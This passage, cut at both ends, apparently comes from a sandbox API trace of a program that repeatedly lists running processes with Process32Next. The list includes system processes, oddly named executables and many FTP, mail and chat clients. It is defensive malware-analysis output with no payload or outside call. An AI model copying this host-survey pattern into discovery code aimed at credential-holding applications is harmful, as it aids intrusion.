lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.615] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0291.617] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0291.618] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0291.620] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0291.638] CloseHandle (hObject=0x2134) returned 1 [0291.638] Sleep (dwMilliseconds=0x64) [0291.752] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2134 [0291.770] Process32First (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.772] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0291.773] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0291.775] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.777] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0291.782] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0291.784] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0291.785] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0291.787] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0291.788] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.790] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.791] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0291.793] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.848] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.849] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.851] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.853] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.854] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.859] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.860] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0291.862] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0291.864] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0291.865] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.867] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0291.869] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0291.870] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0291.875] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0291.876] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0291.878] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0291.879] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0291.881] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0291.883] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0291.884] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0291.886] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0291.939] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0291.940] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0291.942] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0291.943] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0291.945] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0291.946] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0291.947] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0291.949] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0291.951] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0291.955] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0291.956] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0291.958] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0291.959] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0291.961] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0291.962] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0291.964] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0291.968] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0291.969] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0291.971] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0291.972] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0291.974] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0291.976] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0291.977] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0291.979] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0292.023] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0292.029] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0292.032] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0292.034] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0292.036] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0292.038] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0292.040] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0292.043] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0292.047] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0292.049] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0292.051] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0292.053] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0292.054] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0292.056] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0292.058] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0292.063] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0292.064] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0292.066] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0292.067] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0292.069] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0292.071] Process32Next (in: hSnapshot=0x2134, 